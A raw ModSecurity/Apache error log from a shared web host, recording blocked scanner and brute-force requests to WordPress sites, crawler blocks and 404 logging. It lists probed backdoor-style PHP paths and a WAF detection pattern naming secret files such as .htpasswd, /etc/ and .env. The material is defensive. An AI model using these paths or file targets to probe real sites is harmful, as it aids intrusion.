[Tue May 26 17:09:56.363436 2026] [security2:error] [pid 860158:tid 860324] [client 45.154.98.76:54884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWGjIYFlz_JJsUnscKkLwAAAKk"], referer: www.google.com
[Tue May 26 17:09:56.663602 2026] [security2:error] [pid 860158:tid 860290] [client 45.154.98.76:55066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWGjIYFlz_JJsUnscKkOQAAAIc"], referer: www.google.com
[Tue May 26 17:09:56.782852 2026] [security2:error] [pid 860158:tid 860373] [client 45.154.98.76:54588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWGjIYFlz_JJsUnscKkOgAAANo"]
[Tue May 26 17:09:57.100209 2026] [security2:error] [pid 860158:tid 860342] [client 45.154.98.76:55349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/nctlvhme.php"] [unique_id "ahWGjYYFlz_JJsUnscKkPgAAALs"], referer: www.google.com
[Tue May 26 17:09:57.220943 2026] [security2:error] [pid 860158:tid 860325] [client 45.154.98.76:55415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWGjYYFlz_JJsUnscKkRQAAAKo"]
[Tue May 26 17:09:57.371689 2026] [security2:error] [pid 860158:tid 860409] [client 172.86.66.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGjYYFlz_JJsUnscKkSAAAAP4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:09:57.699653 2026] [security2:error] [pid 860158:tid 860341] [client 45.154.98.76:55769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWGjYYFlz_JJsUnscKkVwAAALo"]
[Tue May 26 17:09:58.111945 2026] [security2:error] [pid 860158:tid 860397] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGjYYFlz_JJsUnscKkVgAAAPI"]
[Tue May 26 17:09:58.136288 2026] [security2:error] [pid 860158:tid 860371] [client 45.154.98.76:56080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWGjoYFlz_JJsUnscKkaQAAANg"]
[Tue May 26 17:09:58.281778 2026] [security2:error] [pid 860158:tid 860309] [client 172.86.66.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGjoYFlz_JJsUnscKkbQAAAJo"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1429934&moderation-hash=d5f6669a8e063df5ec07d128d30da23b
[Tue May 26 17:09:59.744013 2026] [security2:error] [pid 860158:tid 860291] [client 157.42.218.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGj4YFlz_JJsUnscKkmgAAAIg"]
[Tue May 26 17:09:59.928532 2026] [security2:error] [pid 860158:tid 860310] [client 74.7.228.58:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.stockmarketanalysis.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWGj4YFlz_JJsUnscKksQAAmxk"]
[Tue May 26 17:10:00.056711 2026] [security2:error] [pid 860158:tid 860290] [client 74.7.175.151:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.stockmarketanalysis.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWGkIYFlz_JJsUnscKkvwAAAIc"]
[Tue May 26 17:10:00.057350 2026] [security2:error] [pid 860158:tid 860309] [client 74.7.175.151:38800] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.stockmarketanalysis.jiyani.in"] [uri "/robots.txt"] [unique_id "ahWGkIYFlz_JJsUnscKkugAAmh8"]
[Tue May 26 17:10:00.409618 2026] [security2:error] [pid 860158:tid 860379] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGj4YFlz_JJsUnscKktwAAAOA"]
[Tue May 26 17:10:02.385194 2026] [security2:error] [pid 860158:tid 860317] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGkYYFlz_JJsUnscKldQAAAKI"]
[Tue May 26 17:10:02.783813 2026] [security2:error] [pid 860158:tid 860355] [client 203.194.101.7:58956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGkoYFlz_JJsUnscKllwAAAMg"]
[Tue May 26 17:10:02.783917 2026] [security2:error] [pid 860158:tid 860355] [client 203.194.101.7:58956] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGkoYFlz_JJsUnscKllwAAAMg"]
[Tue May 26 17:10:03.466097 2026] [security2:error] [pid 860158:tid 860383] [client 85.208.96.194:37218] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWGk4YFlz_JJsUnscKlqQAAAOQ"]
[Tue May 26 17:10:03.466239 2026] [security2:error] [pid 860158:tid 860383] [client 85.208.96.194:37218] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWGk4YFlz_JJsUnscKlqQAAAOQ"]
[Tue May 26 17:10:03.721457 2026] [security2:error] [pid 860158:tid 860409] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGk4YFlz_JJsUnscKlpQAAAP4"]
[Tue May 26 17:10:04.872531 2026] [autoindex:error] [pid 860158:tid 860353] [client 23.27.145.92:13688] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:10:05.297828 2026] [security2:error] [pid 860158:tid 860317] [client 103.174.5.177:63326] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGlIYFlz_JJsUnscKlxwAAAKI"]
[Tue May 26 17:10:06.048823 2026] [security2:error] [pid 860158:tid 860383] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGlYYFlz_JJsUnscKl3gAAAOQ"]
[Tue May 26 17:10:07.016122 2026] [security2:error] [pid 860158:tid 860403] [client 45.145.213.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWGloYFlz_JJsUnscKl7gAAAPg"]
[Tue May 26 17:10:07.879491 2026] [security2:error] [pid 860158:tid 860329] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGl4YFlz_JJsUnscKmCwAAAK4"]
[Tue May 26 17:10:10.710011 2026] [security2:error] [pid 860158:tid 860231] [remote 216.73.216.30:47098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWGmoYFlz_JJsUnscKmagABAUg"]
[Tue May 26 17:10:10.969217 2026] [security2:error] [pid 860158:tid 860367] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGmoYFlz_JJsUnscKmRAAAANQ"]
[Tue May 26 17:10:13.058596 2026] [security2:error] [pid 860158:tid 860330] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGnIYFlz_JJsUnscKmlgAAAK8"]
[Tue May 26 17:10:13.390284 2026] [security2:error] [pid 860158:tid 860318] [client 203.194.101.7:59298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGnYYFlz_JJsUnscKmowAAAKM"]
[Tue May 26 17:10:13.390401 2026] [security2:error] [pid 860158:tid 860318] [client 203.194.101.7:59298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGnYYFlz_JJsUnscKmowAAAKM"]
[Tue May 26 17:10:14.887156 2026] [security2:error] [pid 860158:tid 860357] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGnoYFlz_JJsUnscKm0wAAAMo"]
[Tue May 26 17:10:15.111936 2026] [autoindex:error] [pid 860158:tid 860310] [client 43.163.4.179:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.glorodbalsa.com
[Tue May 26 17:10:16.582164 2026] [security2:error] [pid 860158:tid 860295] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGoIYFlz_JJsUnscKm-QAAAIw"]
[Tue May 26 17:10:16.587125 2026] [security2:error] [pid 860158:tid 860406] [client 114.119.155.142:31241] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.rsmsi.org.in"] [uri "/robots.txt"] [unique_id "ahWGoIYFlz_JJsUnscKnBQAAAPs"]
[Tue May 26 17:10:18.634783 2026] [security2:error] [pid 860158:tid 860398] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGooYFlz_JJsUnscKnLwAAAPM"]
[Tue May 26 17:10:19.145041 2026] [security2:error] [pid 860158:tid 860391] [client 43.173.176.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWGooYFlz_JJsUnscKnOQAAAOw"]
[Tue May 26 17:10:20.114041 2026] [security2:error] [pid 860158:tid 860285] [remote 5.39.1.239:62158] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWGpIYFlz_JJsUnscKnYgAA6n4"]
[Tue May 26 17:10:20.114203 2026] [security2:error] [pid 860158:tid 860389] [client 5.39.1.239:62158] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWGpIYFlz_JJsUnscKnYgAA6n4"]
[Tue May 26 17:10:21.559143 2026] [security2:error] [pid 860158:tid 860187] [remote 54.39.0.99:59858] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.jhonweb.com"] [uri "/"] [unique_id "ahWGpYYFlz_JJsUnscKnfwAAoxw"]
[Tue May 26 17:10:21.559340 2026] [security2:error] [pid 860158:tid 860318] [client 54.39.0.99:59858] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.jhonweb.com"] [uri "/"] [unique_id "ahWGpYYFlz_JJsUnscKnfwAAoxw"]
[Tue May 26 17:10:21.608132 2026] [security2:error] [pid 860158:tid 860392] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGpYYFlz_JJsUnscKneAAAAO0"]
[Tue May 26 17:10:23.592137 2026] [security2:error] [pid 860158:tid 860314] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGp4YFlz_JJsUnscKnswAAAJ8"]
[Tue May 26 17:10:23.620085 2026] [security2:error] [pid 860158:tid 860366] [client 203.194.101.7:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGp4YFlz_JJsUnscKnwgAAANM"]
[Tue May 26 17:10:23.620199 2026] [security2:error] [pid 860158:tid 860366] [client 203.194.101.7:59654] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGp4YFlz_JJsUnscKnwgAAANM"]
[Tue May 26 17:10:23.882454 2026] [security2:error] [pid 860158:tid 860375] [client 188.122.23.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGp4YFlz_JJsUnscKnugAAANw"]
[Tue May 26 17:10:25.408543 2026] [security2:error] [pid 860158:tid 860342] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGqIYFlz_JJsUnscKn8QAAALs"]
[Tue May 26 17:10:27.280817 2026] [security2:error] [pid 860158:tid 860317] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGqoYFlz_JJsUnscKoJgAAAKI"]
[Tue May 26 17:10:29.548518 2026] [security2:error] [pid 860158:tid 860381] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGrYYFlz_JJsUnscKoXAAAAOI"]
[Tue May 26 17:10:29.666207 2026] [security2:error] [pid 860158:tid 860365] [client 114.119.155.149:54855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.osmsi.org.in"] [uri "/osmsi-pastranks.php"] [unique_id "ahWGrYYFlz_JJsUnscKoZwAAANI"], referer: http://www.osmsi.org.in/
[Tue May 26 17:10:32.313849 2026] [security2:error] [pid 860158:tid 860379] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGr4YFlz_JJsUnscKokgAAAOA"]
[Tue May 26 17:10:34.106975 2026] [security2:error] [pid 860158:tid 860337] [client 203.194.101.7:59997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGsoYFlz_JJsUnscKovAAAALY"]
[Tue May 26 17:10:34.107083 2026] [security2:error] [pid 860158:tid 860337] [client 203.194.101.7:59997] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGsoYFlz_JJsUnscKovAAAALY"]
[Tue May 26 17:10:34.453382 2026] [security2:error] [pid 860158:tid 860395] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGsoYFlz_JJsUnscKouwAAAPA"]
[Tue May 26 17:10:35.144527 2026] [security2:error] [pid 860158:tid 860390] [client 103.174.5.177:64218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGsoYFlz_JJsUnscKoxwAAAOs"]
[Tue May 26 17:10:36.436303 2026] [security2:error] [pid 860158:tid 860289] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGtIYFlz_JJsUnscKo5QAAAIY"]
[Tue May 26 17:10:38.074656 2026] [security2:error] [pid 860158:tid 860309] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGtYYFlz_JJsUnscKpBAAAAJo"]
[Tue May 26 17:10:40.587040 2026] [security2:error] [pid 860158:tid 860292] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGuIYFlz_JJsUnscKpNwAAAIk"]
[Tue May 26 17:10:41.660546 2026] [security2:error] [pid 860158:tid 860259] [remote 103.91.67.202:31620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWGuYYFlz_JJsUnscKpSgAA4GQ"]
[Tue May 26 17:10:43.050389 2026] [security2:error] [pid 860158:tid 860371] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGuoYFlz_JJsUnscKpaAAAANg"]
[Tue May 26 17:10:44.616165 2026] [security2:error] [pid 860158:tid 860299] [client 203.194.101.7:60335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGvIYFlz_JJsUnscKpjQAAAJA"]
[Tue May 26 17:10:44.616274 2026] [security2:error] [pid 860158:tid 860299] [client 203.194.101.7:60335] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGvIYFlz_JJsUnscKpjQAAAJA"]
[Tue May 26 17:10:45.152428 2026] [security2:error] [pid 860158:tid 860388] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGvIYFlz_JJsUnscKpkgAAAOk"]
